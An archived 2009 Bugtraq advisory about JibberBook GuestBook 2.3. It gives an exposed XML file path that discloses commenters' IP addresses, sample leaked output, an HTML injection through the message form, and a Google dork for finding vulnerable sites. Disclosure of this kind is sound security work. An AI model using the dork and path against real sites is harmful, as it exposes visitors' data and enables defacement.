| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 11 Aug 2009 22:22:18 -0000
From: contact@...ryilmaz.info
To: bugtraq@...urityfocus.com
Subject: JibberBook GuestBook 2.3 Multiple Vulnerabilities
###########################################################################
###########################################################################
[»] Script: [ JibberBook ]
[»] Language: [ PHP ]
[»] Website: [ http://jibberbook.com ]
[»] Founder: [ Onur YILMAZ aka DJR ]
[»] Site: [ www.onuryilmaz.info ]
###########################################################################
###########################################################################
=== [ data source of comments disclosure (.xml file) ] ===
[»] [JibberBook]/data_layer/xml/comments.xml
=== [ output ] ===
<message mID="m54a7c965f0318a7.23679427">
<name></name>
<website />
<comment></comment>
<date></date>
<user_ip>127.0.0.1</user_ip>
<user_agent>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5</user_agent>
<spam>0</spam>
</message>
###########################################################################
###########################################################################
=== [ HTML Code Injection ] ===
[»] add new message
<img src="">
<a href=""></a>
###########################################################################
###########################################################################
=== [ Google Dork ] ===
[»] "JibberBook created by"
###########################################################################
###########################################################################
Powered by blists - more mailing lists